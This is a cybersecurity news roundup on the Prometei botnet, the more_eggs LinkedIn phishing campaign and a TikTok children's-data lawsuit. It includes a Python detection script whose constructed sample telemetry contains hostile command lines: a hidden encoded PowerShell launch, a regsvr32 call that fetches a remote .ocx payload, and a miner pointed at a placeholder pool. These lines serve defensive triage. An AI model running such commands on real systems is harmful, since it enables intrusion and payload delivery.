Smart home cybersecurity news roundup [April 2021]
Security researchers documented two notable malware campaigns in April: the more_eggs backdoor delivered to LinkedIn users through fake job offers, and the Prometei botnet's exploitation of the Microsoft Exchange vulnerabilities disclosed in March. Social media app TikTok is also under scrutiny over its collection and use of children's data. This month's roundup looks at the security concerns facing social media platforms and corporate infrastructure alike.
Cryptocurrency miner further exploits Microsoft Exchange vulnerabilities
A cryptocurrency-mining botnet named Prometei has been documented by Cybereason's Nocturnus team in response to infections that exploit the Microsoft Exchange vulnerabilities disclosed in March. The researchers note that the malware is opportunistic: it sprays a wide range of victims across many industries rather than selecting targets. The botnet is also under continual development, gaining new modules and tooling, and its earliest versions date back to 2016.
The Exchange vulnerabilities serve as the entry vector for the China Chopper web shell. The web shell launches a PowerShell script that fetches the payload and starts an infection made up of several malicious executables. The files that work together to make the infection both powerful and inconspicuous include:
| File name | Description |
| --- | --- |
| Sqhost.exe | Supports a set of commands for saving and executing files and for setting the C&C servers. Accepts a "-watchdog" parameter that keeps the process running. |
| Exchdefender.exe | Poses as a Microsoft component and quietly removes competing malware from the compromised host. |
| SearchIndexer.exe | The open-source XMRig cryptominer, renamed to match the legitimate Windows Search indexer binary. |
| Rdclip.exe | Handles credential harvesting and the functions used to spread the infection. |
| Nethelper2.exe and Nethelper4.exe | Connect to SQL servers in order to infect them with Sqhost.exe. |
| Windlver.exe | Spreads laterally across the network over SSH. |
The botnet also uses techniques usually associated with advanced persistent threats to keep its foothold on the network. One unusual feature lets the operators configure four different command and control servers, giving the bot redundancy if one of them is taken down. According to Assaf Dahan, head of threat research at Cybereason, the risk goes beyond stolen processing power for cryptomining: the same access could be used to exfiltrate information, or sold on to ransomware gangs.
For more information on this particular strain of malware, see Cybereason's full report on their findings.
Sophisticated spear phishing attempts target LinkedIn users
With unemployment still high, the malware-as-a-service (MaaS) operation known as Golden Chickens is preying on business professionals on LinkedIn with the more_eggs backdoor. The lure is a fake job offer: the malicious archive is named after the victim's current job title as shown on their LinkedIn profile, so that, for example, a Product Manager receives a file called "Product Manager position.zip". This is not the first time more_eggs has been used, but researchers at eSentire's Threat Response Unit, who discovered the activity, outline the current infection chain as follows:
- Triggers Windows Management Instrumentation (WMI), which launches a plugin loader
- The plugin loader hijacks the legitimate Windows processes cmstp.exe and regsvr32.exe
- The loader installs msxsl and loads a .ocx file from AWS as the payload
- The payload signals the command and control server that the victim is ready for exploitation
- Golden Chickens' customer then deploys malware of its choosing
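Both chains above, the Prometei web shell to PowerShell to dropped module sequence and the more_eggs WMI to cmstp/regsvr32 to msxsl sequence, leave distinctive parent/child process relationships in endpoint telemetry. The following triage script is an added example and is not code from Cybereason, eSentire or either malware report. The process-creation records, paths and command lines are constructed to resemble Sysmon Event ID 1 data and are assumptions made for the example, not captured telemetry; the rule names, the `ProcEvent` layout and the `classify`/`triage` functions are likewise this example's own.

```python
"""Process-creation triage for the Prometei and more_eggs chains described above.

Added example, not code from Cybereason, eSentire or either report. The
records below are constructed to resemble Sysmon Event ID 1 / EDR process
creation events; field layout, paths and command lines are assumptions.
"""
from dataclasses import dataclass
from ntpath import basename


@dataclass(frozen=True)
class ProcEvent:
    host: str
    parent: str       # parent image file name
    image_path: str   # full path of the new process
    cmdline: str      # full command line

    @property
    def image(self) -> str:
        return basename(self.image_path).lower()


# Module names from the Prometei write-up. SearchIndexer.exe is handled
# separately because the name collides with a legitimate Windows binary.
PROMETEI_MODULES = {"sqhost.exe", "exchdefender.exe", "rdclip.exe",
                    "nethelper2.exe", "nethelper4.exe", "windlver.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
# Living-off-the-land binaries abused by the more_eggs loader.
MORE_EGGS_LOLBINS = {"cmstp.exe", "regsvr32.exe", "msxsl.exe"}
LOLBIN_PARENTS = {"wmiprvse.exe"} | MORE_EGGS_LOLBINS
SYSTEM32 = "c:\\windows\\system32\\"


def classify(ev: ProcEvent) -> list[str]:
    """Return the names of every rule the event matches (empty if benign)."""
    hits = []
    parent, image, cmd = ev.parent.lower(), ev.image, ev.cmdline.lower()
    path = ev.image_path.lower()

    # 1. Web shell: the IIS worker process should never launch a shell.
    if parent == "w3wp.exe" and image in SHELLS:
        hits.append("webshell_child_process")

    # 2. Prometei modules, by file name or by the -watchdog self-restart switch.
    if image in PROMETEI_MODULES or "-watchdog" in cmd.split():
        hits.append("prometei_module")
    # The miner borrows a real Windows file name; only an off-path copy is suspect.
    if image == "searchindexer.exe" and not path.startswith(SYSTEM32):
        hits.append("prometei_miner_masquerade")

    # 3. more_eggs: WMI -> cmstp/regsvr32 -> msxsl, with a remote .ocx payload.
    if parent in LOLBIN_PARENTS and image in MORE_EGGS_LOLBINS:
        hits.append("more_eggs_lolbin_chain")
    if image == "regsvr32.exe" and "/i:http" in cmd and ".ocx" in cmd:
        hits.append("regsvr32_remote_ocx")
    return hits


def triage(events) -> dict[str, set[str]]:
    """Map each host to the distinct rules fired there, for a per-host verdict."""
    verdict: dict[str, set[str]] = {}
    for ev in events:
        for rule in classify(ev):
            verdict.setdefault(ev.host, set()).add(rule)
    return verdict


# Constructed sample telemetry (assumed, not from a real incident).
SAMPLE_EVENTS = [
    # Exchange host: web shell under IIS spawns PowerShell, which drops Prometei.
    ProcEvent("exch01", "w3wp.exe", r"C:\Windows\System32\cmd.exe",
              "cmd.exe /c powershell -nop -w hidden -enc SQBFAFgA..."),
    ProcEvent("exch01", "cmd.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell -nop -w hidden -enc SQBFAFgA..."),
    ProcEvent("exch01", "powershell.exe", r"C:\Windows\sqhost.exe",
              r"C:\Windows\sqhost.exe -watchdog"),
    ProcEvent("exch01", "sqhost.exe", r"C:\Windows\Temp\SearchIndexer.exe",
              r"C:\Windows\Temp\SearchIndexer.exe -o pool.example:3333"),
    # Legitimate Windows Search service on the same host: must not fire.
    ProcEvent("exch01", "services.exe", r"C:\Windows\System32\SearchIndexer.exe",
              r"C:\Windows\System32\SearchIndexer.exe /Embedding"),
    # Workstation: more_eggs loader chain after the fake job-offer archive is opened.
    ProcEvent("ws07", "wmiprvse.exe", r"C:\Windows\System32\cmstp.exe",
              r"cmstp.exe /ni /s C:\Users\jd\AppData\Local\Temp\x.inf"),
    ProcEvent("ws07", "cmstp.exe", r"C:\Windows\System32\regsvr32.exe",
              "regsvr32.exe /s /n /u /i:https://s3.amazonaws.com/example-bucket/p.ocx scrobj.dll"),
    ProcEvent("ws07", "regsvr32.exe", r"C:\Users\jd\AppData\Local\Temp\msxsl.exe",
              r"msxsl.exe C:\Users\jd\AppData\Local\Temp\a.xml C:\Users\jd\AppData\Local\Temp\b.xsl"),
    # Benign interactive PowerShell: must not fire.
    ProcEvent("ws07", "explorer.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe"),
]

if __name__ == "__main__":
    for host, rules in sorted(triage(SAMPLE_EVENTS).items()):
        print(f"{host}: {', '.join(sorted(rules))}")
```

The SearchIndexer rule is the caveat worth noting: matching on the file name alone would flag every Windows host, so the rule only fires when the binary runs from outside System32. The same reasoning applies to any malware family that reuses legitimate names, and in production the path check should be paired with a signature or hash check on the image.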
Researchers say the motivation behind these attacks is unclear, though some suspect the MaaS customers want footholds in the corporate networks of the victims' current or future employers. However, Golden Chickens' most notable customers, including FIN6, Evilnum and the Cobalt Group, have traditionally targeted technology and finance companies.
A list of indicators and further details about more_eggs can be found in eSentire's research.
TikTok to face lawsuit for misusing information of minors
Social media giant TikTok is at the centre of another controversy, this time a claim alleging the mishandling of children's biometric information, location data, videos and phone numbers. Having been fined $5.7 million by the US Federal Trade Commission in 2019 for illegally collecting personal information from children under 13, the company now faces a lawsuit brought by Anne Longfield, the former children's commissioner for England.
The United Kingdom's Data Protection Act 2018 sets the age of digital consent for information society services at 13; collecting personal data from younger children without parental consent is unlawful. With 44% of UK children aged 8 to 12 reported to use TikTok, and more than 16 million users found to be 14 or younger in 2020, the app's reach is considerable. Longfield's claim argues that TikTok has been "deliberately opaque about the extent of personal information it collects," particularly the information passed to third parties and used to generate advertising revenue. TikTok responded as follows:
Privacy and safety are top priorities for TikTok and we have robust policies, processes and technologies in place to help protect all users, and our teenage users in particular. We believe the claims lack merit and intend to vigorously defend the action.
While the future of TikTok's data privacy practices remains unclear, concerned parents are already taking digital parenting into their own hands. Many families have turned to apps that add parental controls and monitoring to the smart home, providing real-time network visibility as well as web content filtering. For more on keeping a safe, secure and happy online home in 2021, see the Family Online Safety Institute's webinar on digital parenting.